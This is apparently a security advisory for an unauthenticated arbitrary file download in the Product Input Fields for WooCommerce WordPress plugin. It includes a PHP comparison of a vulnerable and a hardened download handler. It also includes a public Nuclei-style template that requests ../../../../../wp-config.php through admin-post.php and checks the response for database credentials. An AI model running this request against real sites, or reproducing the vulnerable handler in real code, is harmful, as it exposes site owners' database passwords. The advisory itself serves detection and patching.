wp-woocommerce-file-download: Product Input Fields for WooCommerce < 1.2.7 - Unauthenticated File Download

Date: 2025-08-01 | Affected software: Product Input Fields for WooCommerce (WordPress plugin), versions before 1.2.7 | PoC: public

Vulnerability description

The Product Input Fields for WooCommerce WordPress plugin before 1.2.7 is vulnerable to arbitrary file download. Its handle_downloads() function, hooked to admin_init, serves the file named in the alg_wc_pif_download_file request parameter without any authorization check. Because admin_init also fires for unauthenticated requests to wp-admin/admin-post.php, and the parameter is used in a filesystem path without traversal filtering, an unauthenticated attacker can supply a path traversal payload (../../../../../wp-config.php in the PoC below) and download arbitrary files from the site, including the database credentials in wp-config.php.
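The following is an added illustration of the bug class described above, not the plugin's own source: a minimal download handler written the way the advisory describes the flaw (no authorization, attacker-controlled path under admin_init), next to a hardened version. The function names, the upload subdirectory alg_wc_pif, the capability edit_shop_orders and the nonce action name are assumptions made for the example; only the alg_wc_pif_download_file parameter and the admin_init hook come from the page.

```php
<?php
// Added example (hypothetical reconstruction, not the plugin's code).
// admin_init fires for wp-admin/admin-post.php even for anonymous visitors,
// so a handler on this hook gets no authentication for free.

// --- Vulnerable pattern ---------------------------------------------------
function pif_example_handle_downloads_vulnerable() {
    if ( ! isset( $_GET['alg_wc_pif_download_file'] ) ) {
        return;
    }
    $upload_dir = wp_upload_dir();
    // Assumed upload subdirectory; the request parameter is concatenated
    // unchanged, so '../../../../../wp-config.php' escapes the directory.
    $file = $upload_dir['basedir'] . '/alg_wc_pif/' . $_GET['alg_wc_pif_download_file'];

    // No capability check and no nonce: anyone who can reach admin-post.php
    // can read any file the web server user can read.
    if ( file_exists( $file ) ) {
        header( 'Content-Type: application/octet-stream' );
        header( 'Content-Disposition: attachment; filename="' . basename( $file ) . '"' );
        readfile( $file );
        exit;
    }
}

// --- Hardened pattern ------------------------------------------------------
function pif_example_handle_downloads_fixed() {
    if ( ! isset( $_GET['alg_wc_pif_download_file'] ) ) {
        return;
    }

    // 1. Authorization: require a logged-in user with an appropriate
    //    capability (edit_shop_orders is an assumed choice for this example).
    if ( ! is_user_logged_in() || ! current_user_can( 'edit_shop_orders' ) ) {
        wp_die( 'Unauthorized', '', array( 'response' => 403 ) );
    }

    // 2. CSRF: the download link must carry a nonce bound to this action
    //    (generated elsewhere with wp_create_nonce( 'alg_wc_pif_download_file' )).
    $nonce = isset( $_GET['_wpnonce'] ) ? sanitize_text_field( wp_unslash( $_GET['_wpnonce'] ) ) : '';
    if ( ! wp_verify_nonce( $nonce, 'alg_wc_pif_download_file' ) ) {
        wp_die( 'Invalid nonce', '', array( 'response' => 403 ) );
    }

    // 3. Path containment: drop every directory component from the user
    //    value, then confirm the resolved path still lies inside the intended
    //    directory. realpath() collapses '..' and symlinks, so a prefix check
    //    against the resolved base is reliable; the trailing separator stops
    //    '/uploads/alg_wc_pif_evil' from matching '/uploads/alg_wc_pif'.
    $upload_dir = wp_upload_dir();
    $base = realpath( trailingslashit( $upload_dir['basedir'] ) . 'alg_wc_pif' );
    $name = basename( sanitize_file_name( wp_unslash( $_GET['alg_wc_pif_download_file'] ) ) );
    $file = ( false !== $base && '' !== $name ) ? realpath( $base . DIRECTORY_SEPARATOR . $name ) : false;

    if ( false === $file || 0 !== strpos( $file, $base . DIRECTORY_SEPARATOR ) || ! is_file( $file ) ) {
        wp_die( 'File not found', '', array( 'response' => 404 ) );
    }

    header( 'Content-Type: application/octet-stream' );
    header( 'Content-Disposition: attachment; filename="' . $name . '"' );
    readfile( $file );
    exit;
}

// Register only the hardened handler.
add_action( 'admin_init', 'pif_example_handle_downloads_fixed' );
```

The three checks are independent and each closes a different hole: the capability check is what the advisory says was missing and is what turns the issue from unauthenticated to at worst an authenticated one; the nonce stops a logged-in administrator being tricked into fetching a file via a crafted link; the basename plus realpath containment removes the traversal regardless of who is asking. Relying on the containment check alone would still leak any customer upload to anyone who can guess its name.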

PoC code [public]

id: wp-woocommerce-file-download

info:
  name: Product Input Fields for WooCommerce < 1.2.7 - Unauthenticated File Download
  author: 0x_Akoko
  severity: high
  description: |
    The Product Input Fields for WooCommerce WordPress plugin before 1.2.7 is vulnerable to arbitrary file download. The lack of authorization checks in the handle_downloads() function hooked to admin_init allows unauthenticated users to download arbitrary files from the site using a path traversal payload.
  reference:
    - https://wpscan.com/vulnerability/15f345e6-fc53-4bac-bc5a-de898181ea74
    - https://blog.nintechnet.com/high-severity-vulnerability-fixed-in-product-input-fields-for-woocommerce/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 8.6
    cwe-id: CWE-22
  metadata:
    max-request: 1
  tags: wordpress,woocommerce,lfi,wp-plugin,wp,vuln

http:
  - method: GET
    path:
      - '{{BaseURL}}/wp-admin/admin-post.php?alg_wc_pif_download_file=../../../../../wp-config.php'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "DB_NAME"
          - "DB_PASSWORD"
        part: body
        condition: and

      - type: status
        status:
          - 200
